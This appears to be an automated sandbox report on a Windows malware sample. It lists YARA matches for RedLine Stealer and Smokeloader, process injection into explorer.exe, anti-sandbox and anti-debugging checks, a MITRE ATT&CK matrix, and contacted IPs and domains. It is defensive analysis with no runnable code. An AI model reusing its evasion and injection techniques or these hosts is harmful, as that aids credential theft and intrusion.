    Source: 00000005.00000002.1991730217.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000005.00000002.1991788095.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.1991754480.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.1749170921.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.1991819627.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403054 RtlCreateUserThread,NtTerminateProcess,0_2_00403054
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401583
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402721 NtEnumerateKey,NtClose,0_2_00402721
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040158E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015BC
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_00403054 RtlCreateUserThread,NtTerminateProcess,5_2_00403054
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401583
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_00402721 NtEnumerateKey,NtClose,5_2_00402721
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040158E
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004015BC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401A280_2_00401A28
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_00401A285_2_00401A28
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.1749095157.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.1749137069.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.1749393819.00000000021F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.1991730217.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000005.00000002.1991788095.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.1991754480.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.1749170921.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.1991819627.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: wdhwgdv.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/2@81/2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00601D11 CreateToolhelp32Snapshot,Module32First,0_2_00601D11
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wdhwgdvJump to behavior
    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeReversingLabs: Detection: 40%
    Source: file.exeVirustotal: Detection: 41%
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\wdhwgdv C:\Users\user\AppData\Roaming\wdhwgdv
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\wdhwgdvUnpacked PE file: 5.2.wdhwgdv.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040294B push ebx; ret 0_2_00402957
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402923 push ebx; ret 0_2_00402926
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402930 push ebx; ret 0_2_00402942
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060956B push edx; iretd 0_2_0060966C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060344D push es; ret 0_2_0060344E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060963F push edx; iretd 0_2_0060966C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609297 push edi; iretd 0_2_006092B2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006229B2 push ebx; ret 0_2_006229BE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062298A push ebx; ret 0_2_0062298D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00622997 push ebx; ret 0_2_006229A9
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_0040294B push ebx; ret 5_2_00402957
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_00402923 push ebx; ret 5_2_00402926
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_00402930 push ebx; ret 5_2_00402942
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_005F344D push es; ret 5_2_005F344E
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_005F956B push edx; iretd 5_2_005F966C
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_005F963F push edx; iretd 5_2_005F966C
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_005F9297 push edi; iretd 5_2_005F92B2
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_006129B2 push ebx; ret 5_2_006129BE
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_0061298A push ebx; ret 5_2_0061298D
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_00612997 push ebx; ret 5_2_006129A9
    Source: file.exeStatic PE information: section name: .text entropy: 7.003544202786242
    Source: wdhwgdv.1.drStatic PE information: section name: .text entropy: 7.003544202786242
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wdhwgdvJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wdhwgdvJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wdhwgdv:Zone.Identifier read attributes | deleteJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Roaming\wdhwgdvAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Roaming\wdhwgdvAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: file.exe, 00000000.00000002.1749200844.000000000064E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 463Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1109Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 850Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3715Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4144Thread sleep count: 463 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5804Thread sleep count: 1109 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5804Thread sleep time: -110900s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3192Thread sleep count: 850 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3192Thread sleep time: -85000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3620Thread sleep count: 299 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5228Thread sleep count: 313 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5228Thread sleep time: -31300s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 5804Thread sleep count: 3715 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5804Thread sleep time: -371500s >= -30000sJump to behavior
    Source: explorer.exe, 00000001.00000000.1741445546.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000001.00000000.1737667705.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
    Source: explorer.exe, 00000001.00000000.1737667705.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
    Source: explorer.exe, 00000001.00000000.1732800538.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
    Source: explorer.exe, 00000001.00000000.1741445546.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000001.00000000.1731345025.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
    Source: explorer.exe, 00000001.00000000.1732800538.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000001.00000000.1741445546.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
    Source: explorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
    Source: explorer.exe, 00000001.00000000.1737667705.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
    Source: explorer.exe, 00000001.00000000.1737667705.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1737667705.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000001.00000000.1741445546.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
    Source: explorer.exe, 00000001.00000000.1731345025.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: explorer.exe, 00000001.00000000.1737667705.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
    Source: explorer.exe, 00000001.00000000.1731345025.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006015EE push dword ptr fs:[00000030h]0_2_006015EE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062092B mov eax, dword ptr fs:[00000030h]0_2_0062092B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00620D90 mov eax, dword ptr fs:[00000030h]0_2_00620D90
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_005F15EE push dword ptr fs:[00000030h]5_2_005F15EE
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_0061092B mov eax, dword ptr fs:[00000030h]5_2_0061092B
    Source: C:\Users\user\AppData\Roaming\wdhwgdvCode function: 5_2_00610D90 mov eax, dword ptr fs:[00000030h]5_2_00610D90

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\explorer.exeFile created: wdhwgdv.1.drJump to dropped file
    Source: C:\Windows\explorer.exeNetwork Connect: 181.123.219.23 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 152.231.120.3 80Jump to behavior
    Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 13619D0Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvThread created: unknown EIP: 33419D0Jump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\wdhwgdvSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: explorer.exe, 00000001.00000000.1731536439.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1732402862.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1737667705.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000001.00000000.1731536439.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000001.00000000.1731345025.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
    Source: explorer.exe, 00000001.00000000.1731536439.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 00000001.00000000.1731536439.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 00000000.00000002.1749393819.00000000021F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1991788095.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1749170921.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1991819627.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 00000000.00000002.1749393819.00000000021F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1991788095.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1749170921.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1991819627.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Exploitation for Client Execution
    1
    DLL Side-Loading
    32
    Process Injection
    11
    Masquerading
    OS Credential Dumping511
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    12
    Virtualization/Sandbox Evasion
    LSASS Memory12
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
    Process Injection
    Security Account Manager3
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive112
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Hidden Files and Directories
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
    Obfuscated Files or Information
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain Credentials12
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    File Deletion
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538051 Sample: file.exe Startdate: 20/10/2024 Architecture: WINDOWS Score: 100 21 volisc.biz 2->21 23 tnc-corp.ru 2->23 25 2 other IPs or domains 2->25 31 Multi AV Scanner detection for domain / URL 2->31 33 Suricata IDS alerts for network traffic 2->33 35 Found malware configuration 2->35 37 7 other signatures 2->37 7 file.exe 2->7         started        10 wdhwgdv 2->10         started        signatures3 process4 signatures5 39 Detected unpacking (changes PE section rights) 7->39 41 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->41 43 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->43 51 4 other signatures 7->51 12 explorer.exe 51 3 7->12 injected 45 Antivirus detection for dropped file 10->45 47 Multi AV Scanner detection for dropped file 10->47 49 Machine Learning detection for dropped file 10->49 process6 dnsIp7 27 181.123.219.23, 56798, 57004, 57064 TelecelSAPY Paraguay 12->27 29 